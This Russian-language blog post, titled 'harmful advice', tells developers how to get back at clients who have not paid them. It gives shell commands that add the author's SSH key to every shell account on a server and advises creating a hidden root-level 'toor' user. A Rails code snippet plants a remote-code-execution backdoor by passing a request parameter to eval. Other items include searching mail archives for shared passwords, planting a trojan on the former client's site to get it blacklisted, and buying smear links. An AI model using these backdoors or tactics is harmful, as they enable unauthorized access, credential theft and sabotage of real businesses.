zed.0xff.me

вредные советы

Что можно сделать “приятного” заказчику, для которого вы сделали много полезной работы, а он вам в ответ показал большую фигу.

меры превентивные, т.е. выполнять это всё надо не тогда, когда уже вас везде заблочили, а когда некоторым чувством вы начинаете чувствовать что вас хотят нае…

((в моем недавнем случае – это два месяца неоплаченной работы под предлогом “завтра-завтра, на следующей неделе..”, а потом жесткий посыл с блокированием акков на серверах)

  • добавить свой ssh public key во все акки на сервере, имеющие шелл (смотреть в /etc/passwd) (нужны рутовые права)
1
2
3
4
5
  mkdir /home/someacc/.ssh
  cat /my/id_rsa.pub >> /home/someacc/.ssh/authorized_keys
  chown -R someacc /home/someacc/.ssh
  chmod 700 /home/someacc/.ssh
  chmod 600 /home/someacc/.ssh/*
  • создать юзера toor с uid=0, gid=0, валидным шеллом и секретным паролем
  • сделать в коде закладку, позволяющую выполнить произвольный код
1
2
3
4
5
6
  # пример для ruby/rails
  dеf %some_controller_method%
    rеndеr :teхt => еval(params[:x].to_s).inspесt
  rеscue Eхception => ех
    rеndеr :teхt => ех.inspect
  еnd
  • прошерстить архив почты на тему каких-то общих паролей к бэйзкампу, амазону и др.сервисам. особенно удобно при использовании гмейла как основного средства обмена сообщениями в проекте – поиск удобный )
  • если на месть не жалко собственных средств – то можно зарегистрироваться на бирже ссылок типа linkfeed.ru или sape.ru, и потратить определенную сумму денег на размещение на различных сайтах ссылок на сайт(ы) обманувшего вас партнера, используя ключевые слова вида “cheaters”, “they stole my money”, “malware site” (?)
  • взять любой троянчик, положить его на сайт бывшего партнера, и отрапортовать в http://www.google.com/safebrowsing/report_badware/
  • прошерстить код приложения на тему eval() и использовать его в своих корыстных целях
  • ваши предложения?

Post a comment


(lesstile enabled - surround code blocks with ---)